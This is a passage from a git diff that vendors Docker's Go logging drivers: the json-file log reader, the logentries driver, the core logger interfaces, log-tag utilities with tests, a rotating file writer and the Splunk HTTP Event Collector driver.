stream doesn't get corrupted due to rotations or other log data written while we read + // This will block writes!!! 
+ l.mu.Lock() + + pth := l.writer.LogPath() + var files []io.ReadSeeker + for i := l.writer.MaxFiles(); i > 1; i-- { + f, err := os.Open(fmt.Sprintf("%s.%d", pth, i-1)) + if err != nil { + if !os.IsNotExist(err) { + logWatcher.Err <- err + break + } + continue + } + defer f.Close() + + files = append(files, f) + } + + latestFile, err := os.Open(pth) + if err != nil { + logWatcher.Err <- err + l.mu.Unlock() + return + } + defer latestFile.Close() + + if config.Tail != 0 { + tailer := ioutils.MultiReadSeeker(append(files, latestFile)...) + tailFile(tailer, logWatcher, config.Tail, config.Since) + } + + // close all the rotated files + for _, f := range files { + if err := f.(io.Closer).Close(); err != nil { + logrus.WithField("logger", "json-file").Warnf("error closing tailed log file: %v", err) + } + } + + if !config.Follow { + if err := latestFile.Close(); err != nil { + logrus.Errorf("Error closing file: %v", err) + } + l.mu.Unlock() + return + } + + if config.Tail >= 0 { + latestFile.Seek(0, os.SEEK_END) + } + + l.readers[logWatcher] = struct{}{} + l.mu.Unlock() + + notifyRotate := l.writer.NotifyRotate() + followLogs(latestFile, logWatcher, notifyRotate, config.Since) + + l.mu.Lock() + delete(l.readers, logWatcher) + l.mu.Unlock() + + l.writer.NotifyRotateEvict(notifyRotate) +} + +func tailFile(f io.ReadSeeker, logWatcher *logger.LogWatcher, tail int, since time.Time) { + var rdr io.Reader + rdr = f + if tail > 0 { + ls, err := tailfile.TailFile(f, tail) + if err != nil { + logWatcher.Err <- err + return + } + rdr = bytes.NewBuffer(bytes.Join(ls, []byte("\n"))) + } + dec := json.NewDecoder(rdr) + l := &jsonlog.JSONLog{} + for { + msg, err := decodeLogLine(dec, l) + if err != nil { + if err != io.EOF { + logWatcher.Err <- err + } + return + } + if !since.IsZero() && msg.Timestamp.Before(since) { + continue + } + logWatcher.Msg <- msg + } +} + +func watchFile(name string) (filenotify.FileWatcher, error) { + fileWatcher, err := filenotify.New() + if err != nil { + 
return nil, err + } + + if err := fileWatcher.Add(name); err != nil { + logrus.WithField("logger", "json-file").Warnf("falling back to file poller due to error: %v", err) + fileWatcher.Close() + fileWatcher = filenotify.NewPollingWatcher() + + if err := fileWatcher.Add(name); err != nil { + fileWatcher.Close() + logrus.Debugf("error watching log file for modifications: %v", err) + return nil, err + } + } + return fileWatcher, nil +} + +func followLogs(f *os.File, logWatcher *logger.LogWatcher, notifyRotate chan interface{}, since time.Time) { + dec := json.NewDecoder(f) + l := &jsonlog.JSONLog{} + + name := f.Name() + fileWatcher, err := watchFile(name) + if err != nil { + logWatcher.Err <- err + return + } + defer func() { + f.Close() + fileWatcher.Remove(name) + fileWatcher.Close() + }() + + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + go func() { + select { + case <-logWatcher.WatchClose(): + fileWatcher.Remove(name) + cancel() + case <-ctx.Done(): + return + } + }() + + var retries int + handleRotate := func() error { + f.Close() + fileWatcher.Remove(name) + + // retry when the file doesn't exist + for retries := 0; retries <= 5; retries++ { + f, err = os.Open(name) + if err == nil || !os.IsNotExist(err) { + break + } + } + if err != nil { + return err + } + if err := fileWatcher.Add(name); err != nil { + return err + } + dec = json.NewDecoder(f) + return nil + } + + errRetry := errors.New("retry") + errDone := errors.New("done") + waitRead := func() error { + select { + case e := <-fileWatcher.Events(): + switch e.Op { + case fsnotify.Write: + dec = json.NewDecoder(f) + return nil + case fsnotify.Rename, fsnotify.Remove: + select { + case <-notifyRotate: + case <-ctx.Done(): + return errDone + } + if err := handleRotate(); err != nil { + return err + } + return nil + } + return errRetry + case err := <-fileWatcher.Errors(): + logrus.Debug("logger got error watching file: %v", err) + // Something happened, let's try and stay alive 
and create a new watcher + if retries <= 5 { + fileWatcher.Close() + fileWatcher, err = watchFile(name) + if err != nil { + return err + } + retries++ + return errRetry + } + return err + case <-ctx.Done(): + return errDone + } + } + + handleDecodeErr := func(err error) error { + if err == io.EOF { + for err := waitRead(); err != nil; { + if err == errRetry { + // retry the waitRead + continue + } + return err + } + return nil + } + // try again because this shouldn't happen + if _, ok := err.(*json.SyntaxError); ok && retries <= maxJSONDecodeRetry { + dec = json.NewDecoder(f) + retries++ + return nil + } + // io.ErrUnexpectedEOF is returned from json.Decoder when there is + // remaining data in the parser's buffer while an io.EOF occurs. + // If the json logger writes a partial json log entry to the disk + // while at the same time the decoder tries to decode it, the race condition happens. + if err == io.ErrUnexpectedEOF && retries <= maxJSONDecodeRetry { + reader := io.MultiReader(dec.Buffered(), f) + dec = json.NewDecoder(reader) + retries++ + return nil + } + return err + } + + // main loop + for { + msg, err := decodeLogLine(dec, l) + if err != nil { + if err := handleDecodeErr(err); err != nil { + if err == errDone { + return + } + // we got an unrecoverable error, so return + logWatcher.Err <- err + return + } + // ready to try again + continue + } + + retries = 0 // reset retries since we've succeeded + if !since.IsZero() && msg.Timestamp.Before(since) { + continue + } + select { + case logWatcher.Msg <- msg: + case <-ctx.Done(): + logWatcher.Msg <- msg + for { + msg, err := decodeLogLine(dec, l) + if err != nil { + return + } + if !since.IsZero() && msg.Timestamp.Before(since) { + continue + } + logWatcher.Msg <- msg + } + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/logger/logentries/logentries.go b/vendor/github.com/docker/docker/daemon/logger/logentries/logentries.go new file mode 100644 index 0000000000..e794b1ed08 --- /dev/null +++ 
b/vendor/github.com/docker/docker/daemon/logger/logentries/logentries.go @@ -0,0 +1,94 @@ +// Package logentries provides the log driver for forwarding server logs +// to logentries endpoints. +package logentries + +import ( + "fmt" + + "github.com/Sirupsen/logrus" + "github.com/bsphere/le_go" + "github.com/docker/docker/daemon/logger" +) + +type logentries struct { + tag string + containerID string + containerName string + writer *le_go.Logger + extra map[string]string +} + +const ( + name = "logentries" + token = "logentries-token" +) + +func init() { + if err := logger.RegisterLogDriver(name, New); err != nil { + logrus.Fatal(err) + } + if err := logger.RegisterLogOptValidator(name, ValidateLogOpt); err != nil { + logrus.Fatal(err) + } +} + +// New creates a logentries logger using the configuration passed in on +// the context. The supported context configuration variable is +// logentries-token. +func New(ctx logger.Context) (logger.Logger, error) { + logrus.WithField("container", ctx.ContainerID). + WithField("token", ctx.Config[token]). + Debug("logging driver logentries configured") + + log, err := le_go.Connect(ctx.Config[token]) + if err != nil { + return nil, err + } + return &logentries{ + containerID: ctx.ContainerID, + containerName: ctx.ContainerName, + writer: log, + }, nil +} + +func (f *logentries) Log(msg *logger.Message) error { + data := map[string]string{ + "container_id": f.containerID, + "container_name": f.containerName, + "source": msg.Source, + "log": string(msg.Line), + } + for k, v := range f.extra { + data[k] = v + } + f.writer.Println(f.tag, msg.Timestamp, data) + return nil +} + +func (f *logentries) Close() error { + return f.writer.Close() +} + +func (f *logentries) Name() string { + return name +} + +// ValidateLogOpt looks for logentries specific log option logentries-address. 
+func ValidateLogOpt(cfg map[string]string) error { + for key := range cfg { + switch key { + case "env": + case "labels": + case "tag": + case key: + default: + return fmt.Errorf("unknown log opt '%s' for logentries log driver", key) + } + } + + if cfg[token] == "" { + return fmt.Errorf("Missing logentries token") + } + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/logger/logger.go b/vendor/github.com/docker/docker/daemon/logger/logger.go new file mode 100644 index 0000000000..d091997358 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/logger.go @@ -0,0 +1,134 @@ +// Package logger defines interfaces that logger drivers implement to +// log messages. +// +// The other half of a logger driver is the implementation of the +// factory, which holds the contextual instance information that +// allows multiple loggers of the same type to perform different +// actions, such as logging to different locations. +package logger + +import ( + "errors" + "sort" + "strings" + "sync" + "time" + + "github.com/docker/docker/pkg/jsonlog" +) + +// ErrReadLogsNotSupported is returned when the logger does not support reading logs. +var ErrReadLogsNotSupported = errors.New("configured logging reader does not support reading") + +const ( + // TimeFormat is the time format used for timestamps sent to log readers. + TimeFormat = jsonlog.RFC3339NanoFixed + logWatcherBufferSize = 4096 +) + +// Message is datastructure that represents piece of output produced by some +// container. The Line member is a slice of an array whose contents can be +// changed after a log driver's Log() method returns. +type Message struct { + Line []byte + Source string + Timestamp time.Time + Attrs LogAttributes + Partial bool +} + +// CopyMessage creates a copy of the passed-in Message which will remain +// unchanged if the original is changed. 
Log drivers which buffer Messages +// rather than dispatching them during their Log() method should use this +// function to obtain a Message whose Line member's contents won't change. +func CopyMessage(msg *Message) *Message { + m := new(Message) + m.Line = make([]byte, len(msg.Line)) + copy(m.Line, msg.Line) + m.Source = msg.Source + m.Timestamp = msg.Timestamp + m.Partial = msg.Partial + m.Attrs = make(LogAttributes) + for k, v := range msg.Attrs { + m.Attrs[k] = v + } + return m +} + +// LogAttributes is used to hold the extra attributes available in the log message +// Primarily used for converting the map type to string and sorting. +type LogAttributes map[string]string +type byKey []string + +func (s byKey) Len() int { return len(s) } +func (s byKey) Less(i, j int) bool { + keyI := strings.Split(s[i], "=") + keyJ := strings.Split(s[j], "=") + return keyI[0] < keyJ[0] +} +func (s byKey) Swap(i, j int) { + s[i], s[j] = s[j], s[i] +} + +func (a LogAttributes) String() string { + var ss byKey + for k, v := range a { + ss = append(ss, k+"="+v) + } + sort.Sort(ss) + return strings.Join(ss, ",") +} + +// Logger is the interface for docker logging drivers. +type Logger interface { + Log(*Message) error + Name() string + Close() error +} + +// ReadConfig is the configuration passed into ReadLogs. +type ReadConfig struct { + Since time.Time + Tail int + Follow bool +} + +// LogReader is the interface for reading log messages for loggers that support reading. +type LogReader interface { + // Read logs from underlying logging backend + ReadLogs(ReadConfig) *LogWatcher +} + +// LogWatcher is used when consuming logs read from the LogReader interface. +type LogWatcher struct { + // For sending log messages to a reader. + Msg chan *Message + // For sending error messages that occur while while reading logs. + Err chan error + closeOnce sync.Once + closeNotifier chan struct{} +} + +// NewLogWatcher returns a new LogWatcher. 
+func NewLogWatcher() *LogWatcher { + return &LogWatcher{ + Msg: make(chan *Message, logWatcherBufferSize), + Err: make(chan error, 1), + closeNotifier: make(chan struct{}), + } +} + +// Close notifies the underlying log reader to stop. +func (w *LogWatcher) Close() { + // only close if not already closed + w.closeOnce.Do(func() { + close(w.closeNotifier) + }) +} + +// WatchClose returns a channel receiver that receives notification +// when the watcher has been closed. This should only be called from +// one goroutine. +func (w *LogWatcher) WatchClose() <-chan struct{} { + return w.closeNotifier +} diff --git a/vendor/github.com/docker/docker/daemon/logger/logger_test.go b/vendor/github.com/docker/docker/daemon/logger/logger_test.go new file mode 100644 index 0000000000..16e1514d2d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/logger_test.go @@ -0,0 +1,26 @@ +package logger + +import ( + "reflect" + "testing" + "time" +) + +func TestCopyMessage(t *testing.T) { + msg := &Message{ + Line: []byte("test line."), + Source: "stdout", + Timestamp: time.Now(), + Attrs: LogAttributes{ + "key1": "val1", + "key2": "val2", + "key3": "val3", + }, + Partial: true, + } + + m := CopyMessage(msg) + if !reflect.DeepEqual(m, msg) { + t.Fatalf("CopyMessage failed to copy message") + } +} diff --git a/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag.go b/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag.go new file mode 100644 index 0000000000..4752679c72 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag.go @@ -0,0 +1,31 @@ +package loggerutils + +import ( + "bytes" + + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/utils/templates" +) + +// DefaultTemplate defines the defaults template logger should use. 
+const DefaultTemplate = "{{.ID}}" + +// ParseLogTag generates a context aware tag for consistency across different +// log drivers based on the context of the running container. +func ParseLogTag(ctx logger.Context, defaultTemplate string) (string, error) { + tagTemplate := ctx.Config["tag"] + if tagTemplate == "" { + tagTemplate = defaultTemplate + } + + tmpl, err := templates.NewParse("log-tag", tagTemplate) + if err != nil { + return "", err + } + buf := new(bytes.Buffer) + if err := tmpl.Execute(buf, &ctx); err != nil { + return "", err + } + + return buf.String(), nil +} diff --git a/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag_test.go b/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag_test.go new file mode 100644 index 0000000000..e2aa4358aa --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag_test.go @@ -0,0 +1,47 @@ +package loggerutils + +import ( + "testing" + + "github.com/docker/docker/daemon/logger" +) + +func TestParseLogTagDefaultTag(t *testing.T) { + ctx := buildContext(map[string]string{}) + tag, e := ParseLogTag(ctx, "{{.ID}}") + assertTag(t, e, tag, ctx.ID()) +} + +func TestParseLogTag(t *testing.T) { + ctx := buildContext(map[string]string{"tag": "{{.ImageName}}/{{.Name}}/{{.ID}}"}) + tag, e := ParseLogTag(ctx, "{{.ID}}") + assertTag(t, e, tag, "test-image/test-container/container-ab") +} + +func TestParseLogTagEmptyTag(t *testing.T) { + ctx := buildContext(map[string]string{}) + tag, e := ParseLogTag(ctx, "{{.DaemonName}}/{{.ID}}") + assertTag(t, e, tag, "test-dockerd/container-ab") +} + +// Helpers + +func buildContext(cfg map[string]string) logger.Context { + return logger.Context{ + ContainerID: "container-abcdefghijklmnopqrstuvwxyz01234567890", + ContainerName: "/test-container", + ContainerImageID: "image-abcdefghijklmnopqrstuvwxyz01234567890", + ContainerImageName: "test-image", + Config: cfg, + DaemonName: "test-dockerd", + } +} + +func assertTag(t *testing.T, e 
error, tag string, expected string) { + if e != nil { + t.Fatalf("Error generating tag: %q", e) + } + if tag != expected { + t.Fatalf("Wrong tag: %q, should be %q", tag, expected) + } +} diff --git a/vendor/github.com/docker/docker/daemon/logger/loggerutils/rotatefilewriter.go b/vendor/github.com/docker/docker/daemon/logger/loggerutils/rotatefilewriter.go new file mode 100644 index 0000000000..99e0964aea --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/loggerutils/rotatefilewriter.go @@ -0,0 +1,124 @@ +package loggerutils + +import ( + "os" + "strconv" + "sync" + + "github.com/docker/docker/pkg/pubsub" +) + +// RotateFileWriter is Logger implementation for default Docker logging. +type RotateFileWriter struct { + f *os.File // store for closing + mu sync.Mutex + capacity int64 //maximum size of each file + currentSize int64 // current size of the latest file + maxFiles int //maximum number of files + notifyRotate *pubsub.Publisher +} + +//NewRotateFileWriter creates new RotateFileWriter +func NewRotateFileWriter(logPath string, capacity int64, maxFiles int) (*RotateFileWriter, error) { + log, err := os.OpenFile(logPath, os.O_WRONLY|os.O_APPEND|os.O_CREATE, 0640) + if err != nil { + return nil, err + } + + size, err := log.Seek(0, os.SEEK_END) + if err != nil { + return nil, err + } + + return &RotateFileWriter{ + f: log, + capacity: capacity, + currentSize: size, + maxFiles: maxFiles, + notifyRotate: pubsub.NewPublisher(0, 1), + }, nil +} + +//WriteLog write log message to File +func (w *RotateFileWriter) Write(message []byte) (int, error) { + w.mu.Lock() + if err := w.checkCapacityAndRotate(); err != nil { + w.mu.Unlock() + return -1, err + } + + n, err := w.f.Write(message) + if err == nil { + w.currentSize += int64(n) + } + w.mu.Unlock() + return n, err +} + +func (w *RotateFileWriter) checkCapacityAndRotate() error { + if w.capacity == -1 { + return nil + } + + if w.currentSize >= w.capacity { + name := w.f.Name() + if err := w.f.Close(); err 
!= nil { + return err + } + if err := rotate(name, w.maxFiles); err != nil { + return err + } + file, err := os.OpenFile(name, os.O_WRONLY|os.O_TRUNC|os.O_CREATE, 06400) + if err != nil { + return err + } + w.f = file + w.currentSize = 0 + w.notifyRotate.Publish(struct{}{}) + } + + return nil +} + +func rotate(name string, maxFiles int) error { + if maxFiles < 2 { + return nil + } + for i := maxFiles - 1; i > 1; i-- { + toPath := name + "." + strconv.Itoa(i) + fromPath := name + "." + strconv.Itoa(i-1) + if err := os.Rename(fromPath, toPath); err != nil && !os.IsNotExist(err) { + return err + } + } + + if err := os.Rename(name, name+".1"); err != nil && !os.IsNotExist(err) { + return err + } + return nil +} + +// LogPath returns the location the given writer logs to. +func (w *RotateFileWriter) LogPath() string { + return w.f.Name() +} + +// MaxFiles return maximum number of files +func (w *RotateFileWriter) MaxFiles() int { + return w.maxFiles +} + +//NotifyRotate returns the new subscriber +func (w *RotateFileWriter) NotifyRotate() chan interface{} { + return w.notifyRotate.Subscribe() +} + +//NotifyRotateEvict removes the specified subscriber from receiving any more messages. +func (w *RotateFileWriter) NotifyRotateEvict(sub chan interface{}) { + w.notifyRotate.Evict(sub) +} + +// Close closes underlying file and signals all readers to stop. +func (w *RotateFileWriter) Close() error { + return w.f.Close() +} diff --git a/vendor/github.com/docker/docker/daemon/logger/splunk/splunk.go b/vendor/github.com/docker/docker/daemon/logger/splunk/splunk.go new file mode 100644 index 0000000000..f85832681a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/splunk/splunk.go @@ -0,0 +1,621 @@ +// Package splunk provides the log driver for forwarding server logs to +// Splunk HTTP Event Collector endpoint. 
+package splunk + +import ( + "bytes" + "compress/gzip" + "crypto/tls" + "crypto/x509" + "encoding/json" + "fmt" + "io" + "io/ioutil" + "net/http" + "net/url" + "os" + "strconv" + "sync" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/daemon/logger/loggerutils" + "github.com/docker/docker/pkg/urlutil" +) + +const ( + driverName = "splunk" + splunkURLKey = "splunk-url" + splunkTokenKey = "splunk-token" + splunkSourceKey = "splunk-source" + splunkSourceTypeKey = "splunk-sourcetype" + splunkIndexKey = "splunk-index" + splunkCAPathKey = "splunk-capath" + splunkCANameKey = "splunk-caname" + splunkInsecureSkipVerifyKey = "splunk-insecureskipverify" + splunkFormatKey = "splunk-format" + splunkVerifyConnectionKey = "splunk-verify-connection" + splunkGzipCompressionKey = "splunk-gzip" + splunkGzipCompressionLevelKey = "splunk-gzip-level" + envKey = "env" + labelsKey = "labels" + tagKey = "tag" +) + +const ( + // How often do we send messages (if we are not reaching batch size) + defaultPostMessagesFrequency = 5 * time.Second + // How big can be batch of messages + defaultPostMessagesBatchSize = 1000 + // Maximum number of messages we can store in buffer + defaultBufferMaximum = 10 * defaultPostMessagesBatchSize + // Number of messages allowed to be queued in the channel + defaultStreamChannelSize = 4 * defaultPostMessagesBatchSize +) + +const ( + envVarPostMessagesFrequency = "SPLUNK_LOGGING_DRIVER_POST_MESSAGES_FREQUENCY" + envVarPostMessagesBatchSize = "SPLUNK_LOGGING_DRIVER_POST_MESSAGES_BATCH_SIZE" + envVarBufferMaximum = "SPLUNK_LOGGING_DRIVER_BUFFER_MAX" + envVarStreamChannelSize = "SPLUNK_LOGGING_DRIVER_CHANNEL_SIZE" +) + +type splunkLoggerInterface interface { + logger.Logger + worker() +} + +type splunkLogger struct { + client *http.Client + transport *http.Transport + + url string + auth string + nullMessage *splunkMessage + + // http compression + gzipCompression bool + gzipCompressionLevel int + + 
// Advanced options + postMessagesFrequency time.Duration + postMessagesBatchSize int + bufferMaximum int + + // For synchronization between background worker and logger. + // We use channel to send messages to worker go routine. + // All other variables for blocking Close call before we flush all messages to HEC + stream chan *splunkMessage + lock sync.RWMutex + closed bool + closedCond *sync.Cond +} + +type splunkLoggerInline struct { + *splunkLogger + + nullEvent *splunkMessageEvent +} + +type splunkLoggerJSON struct { + *splunkLoggerInline +} + +type splunkLoggerRaw struct { + *splunkLogger + + prefix []byte +} + +type splunkMessage struct { + Event interface{} `json:"event"` + Time string `json:"time"` + Host string `json:"host"` + Source string `json:"source,omitempty"` + SourceType string `json:"sourcetype,omitempty"` + Index string `json:"index,omitempty"` +} + +type splunkMessageEvent struct { + Line interface{} `json:"line"` + Source string `json:"source"` + Tag string `json:"tag,omitempty"` + Attrs map[string]string `json:"attrs,omitempty"` +} + +const ( + splunkFormatRaw = "raw" + splunkFormatJSON = "json" + splunkFormatInline = "inline" +) + +func init() { + if err := logger.RegisterLogDriver(driverName, New); err != nil { + logrus.Fatal(err) + } + if err := logger.RegisterLogOptValidator(driverName, ValidateLogOpt); err != nil { + logrus.Fatal(err) + } +} + +// New creates splunk logger driver using configuration passed in context +func New(ctx logger.Context) (logger.Logger, error) { + hostname, err := ctx.Hostname() + if err != nil { + return nil, fmt.Errorf("%s: cannot access hostname to set source field", driverName) + } + + // Parse and validate Splunk URL + splunkURL, err := parseURL(ctx) + if err != nil { + return nil, err + } + + // Splunk Token is required parameter + splunkToken, ok := ctx.Config[splunkTokenKey] + if !ok { + return nil, fmt.Errorf("%s: %s is expected", driverName, splunkTokenKey) + } + + tlsConfig := &tls.Config{} + + // 
Splunk is using autogenerated certificates by default, + // allow users to trust them with skipping verification + if insecureSkipVerifyStr, ok := ctx.Config[splunkInsecureSkipVerifyKey]; ok { + insecureSkipVerify, err := strconv.ParseBool(insecureSkipVerifyStr) + if err != nil { + return nil, err + } + tlsConfig.InsecureSkipVerify = insecureSkipVerify + } + + // If path to the root certificate is provided - load it + if caPath, ok := ctx.Config[splunkCAPathKey]; ok { + caCert, err := ioutil.ReadFile(caPath) + if err != nil { + return nil, err + } + caPool := x509.NewCertPool() + caPool.AppendCertsFromPEM(caCert) + tlsConfig.RootCAs = caPool + } + + if caName, ok := ctx.Config[splunkCANameKey]; ok { + tlsConfig.ServerName = caName + } + + gzipCompression := false + if gzipCompressionStr, ok := ctx.Config[splunkGzipCompressionKey]; ok { + gzipCompression, err = strconv.ParseBool(gzipCompressionStr) + if err != nil { + return nil, err + } + } + + gzipCompressionLevel := gzip.DefaultCompression + if gzipCompressionLevelStr, ok := ctx.Config[splunkGzipCompressionLevelKey]; ok { + var err error + gzipCompressionLevel64, err := strconv.ParseInt(gzipCompressionLevelStr, 10, 32) + if err != nil { + return nil, err + } + gzipCompressionLevel = int(gzipCompressionLevel64) + if gzipCompressionLevel < gzip.DefaultCompression || gzipCompressionLevel > gzip.BestCompression { + err := fmt.Errorf("Not supported level '%s' for %s (supported values between %d and %d).", + gzipCompressionLevelStr, splunkGzipCompressionLevelKey, gzip.DefaultCompression, gzip.BestCompression) + return nil, err + } + } + + transport := &http.Transport{ + TLSClientConfig: tlsConfig, + } + client := &http.Client{ + Transport: transport, + } + + source := ctx.Config[splunkSourceKey] + sourceType := ctx.Config[splunkSourceTypeKey] + index := ctx.Config[splunkIndexKey] + + var nullMessage = &splunkMessage{ + Host: hostname, + Source: source, + SourceType: sourceType, + Index: index, + } + + // Allow user to 
remove tag from the messages by setting tag to empty string + tag := "" + if tagTemplate, ok := ctx.Config[tagKey]; !ok || tagTemplate != "" { + tag, err = loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate) + if err != nil { + return nil, err + } + } + + attrs := ctx.ExtraAttributes(nil) + + var ( + postMessagesFrequency = getAdvancedOptionDuration(envVarPostMessagesFrequency, defaultPostMessagesFrequency) + postMessagesBatchSize = getAdvancedOptionInt(envVarPostMessagesBatchSize, defaultPostMessagesBatchSize) + bufferMaximum = getAdvancedOptionInt(envVarBufferMaximum, defaultBufferMaximum) + streamChannelSize = getAdvancedOptionInt(envVarStreamChannelSize, defaultStreamChannelSize) + ) + + logger := &splunkLogger{ + client: client, + transport: transport, + url: splunkURL.String(), + auth: "Splunk " + splunkToken, + nullMessage: nullMessage, + gzipCompression: gzipCompression, + gzipCompressionLevel: gzipCompressionLevel, + stream: make(chan *splunkMessage, streamChannelSize), + postMessagesFrequency: postMessagesFrequency, + postMessagesBatchSize: postMessagesBatchSize, + bufferMaximum: bufferMaximum, + } + + // By default we verify connection, but we allow use to skip that + verifyConnection := true + if verifyConnectionStr, ok := ctx.Config[splunkVerifyConnectionKey]; ok { + var err error + verifyConnection, err = strconv.ParseBool(verifyConnectionStr) + if err != nil { + return nil, err + } + } + if verifyConnection { + err = verifySplunkConnection(logger) + if err != nil { + return nil, err + } + } + + var splunkFormat string + if splunkFormatParsed, ok := ctx.Config[splunkFormatKey]; ok { + switch splunkFormatParsed { + case splunkFormatInline: + case splunkFormatJSON: + case splunkFormatRaw: + default: + return nil, fmt.Errorf("Unknown format specified %s, supported formats are inline, json and raw", splunkFormat) + } + splunkFormat = splunkFormatParsed + } else { + splunkFormat = splunkFormatInline + } + + var loggerWrapper splunkLoggerInterface + + 
switch splunkFormat { + case splunkFormatInline: + nullEvent := &splunkMessageEvent{ + Tag: tag, + Attrs: attrs, + } + + loggerWrapper = &splunkLoggerInline{logger, nullEvent} + case splunkFormatJSON: + nullEvent := &splunkMessageEvent{ + Tag: tag, + Attrs: attrs, + } + + loggerWrapper = &splunkLoggerJSON{&splunkLoggerInline{logger, nullEvent}} + case splunkFormatRaw: + var prefix bytes.Buffer + if tag != "" { + prefix.WriteString(tag) + prefix.WriteString(" ") + } + for key, value := range attrs { + prefix.WriteString(key) + prefix.WriteString("=") + prefix.WriteString(value) + prefix.WriteString(" ") + } + + loggerWrapper = &splunkLoggerRaw{logger, prefix.Bytes()} + default: + return nil, fmt.Errorf("Unexpected format %s", splunkFormat) + } + + go loggerWrapper.worker() + + return loggerWrapper, nil +} + +func (l *splunkLoggerInline) Log(msg *logger.Message) error { + message := l.createSplunkMessage(msg) + + event := *l.nullEvent + event.Line = string(msg.Line) + event.Source = msg.Source + + message.Event = &event + + return l.queueMessageAsync(message) +} + +func (l *splunkLoggerJSON) Log(msg *logger.Message) error { + message := l.createSplunkMessage(msg) + event := *l.nullEvent + + var rawJSONMessage json.RawMessage + if err := json.Unmarshal(msg.Line, &rawJSONMessage); err == nil { + event.Line = &rawJSONMessage + } else { + event.Line = string(msg.Line) + } + + event.Source = msg.Source + + message.Event = &event + + return l.queueMessageAsync(message) +} + +func (l *splunkLoggerRaw) Log(msg *logger.Message) error { + message := l.createSplunkMessage(msg) + + message.Event = string(append(l.prefix, msg.Line...)) + + return l.queueMessageAsync(message) +} + +func (l *splunkLogger) queueMessageAsync(message *splunkMessage) error { + l.lock.RLock() + defer l.lock.RUnlock() + if l.closedCond != nil { + return fmt.Errorf("%s: driver is closed", driverName) + } + l.stream <- message + return nil +} + +func (l *splunkLogger) worker() { + timer := 
time.NewTicker(l.postMessagesFrequency) + var messages []*splunkMessage + for { + select { + case message, open := <-l.stream: + if !open { + l.postMessages(messages, true) + l.lock.Lock() + defer l.lock.Unlock() + l.transport.CloseIdleConnections() + l.closed = true + l.closedCond.Signal() + return + } + messages = append(messages, message) + // Only sending when we get exactly to the batch size, + // This also helps not to fire postMessages on every new message, + // when previous try failed. + if len(messages)%l.postMessagesBatchSize == 0 { + messages = l.postMessages(messages, false) + } + case <-timer.C: + messages = l.postMessages(messages, false) + } + } +} + +func (l *splunkLogger) postMessages(messages []*splunkMessage, lastChance bool) []*splunkMessage { + messagesLen := len(messages) + for i := 0; i < messagesLen; i += l.postMessagesBatchSize { + upperBound := i + l.postMessagesBatchSize + if upperBound > messagesLen { + upperBound = messagesLen + } + if err := l.tryPostMessages(messages[i:upperBound]); err != nil { + logrus.Error(err) + if messagesLen-i >= l.bufferMaximum || lastChance { + // If this is last chance - print them all to the daemon log + if lastChance { + upperBound = messagesLen + } + // Not all sent, but buffer has got to its maximum, let's log all messages + // we could not send and return buffer minus one batch size + for j := i; j < upperBound; j++ { + if jsonEvent, err := json.Marshal(messages[j]); err != nil { + logrus.Error(err) + } else { + logrus.Error(fmt.Errorf("Failed to send a message '%s'", string(jsonEvent))) + } + } + return messages[upperBound:messagesLen] + } + // Not all sent, returning buffer from where we have not sent messages + return messages[i:messagesLen] + } + } + // All sent, return empty buffer + return messages[:0] +} + +func (l *splunkLogger) tryPostMessages(messages []*splunkMessage) error { + if len(messages) == 0 { + return nil + } + var buffer bytes.Buffer + var writer io.Writer + var gzipWriter 
*gzip.Writer + var err error + // If gzip compression is enabled - create gzip writer with specified compression + // level. If gzip compression is disabled, use standard buffer as a writer + if l.gzipCompression { + gzipWriter, err = gzip.NewWriterLevel(&buffer, l.gzipCompressionLevel) + if err != nil { + return err + } + writer = gzipWriter + } else { + writer = &buffer + } + for _, message := range messages { + jsonEvent, err := json.Marshal(message) + if err != nil { + return err + } + if _, err := writer.Write(jsonEvent); err != nil { + return err + } + } + // If gzip compression is enabled, tell it, that we are done + if l.gzipCompression { + err = gzipWriter.Close() + if err != nil { + return err + } + } + req, err := http.NewRequest("POST", l.url, bytes.NewBuffer(buffer.Bytes())) + if err != nil { + return err + } + req.Header.Set("Authorization", l.auth) + // Tell if we are sending gzip compressed body + if l.gzipCompression { + req.Header.Set("Content-Encoding", "gzip") + } + res, err := l.client.Do(req) + if err != nil { + return err + } + defer res.Body.Close() + if res.StatusCode != http.StatusOK { + var body []byte + body, err = ioutil.ReadAll(res.Body) + if err != nil { + return err + } + return fmt.Errorf("%s: failed to send event - %s - %s", driverName, res.Status, body) + } + io.Copy(ioutil.Discard, res.Body) + return nil +} + +func (l *splunkLogger) Close() error { + l.lock.Lock() + defer l.lock.Unlock() + if l.closedCond == nil { + l.closedCond = sync.NewCond(&l.lock) + close(l.stream) + for !l.closed { + l.closedCond.Wait() + } + } + return nil +} + +func (l *splunkLogger) Name() string { + return driverName +} + +func (l *splunkLogger) createSplunkMessage(msg *logger.Message) *splunkMessage { + message := *l.nullMessage + message.Time = fmt.Sprintf("%f", float64(msg.Timestamp.UnixNano())/float64(time.Second)) + return &message +} + +// ValidateLogOpt looks for all supported by splunk driver options +func ValidateLogOpt(cfg map[string]string) 
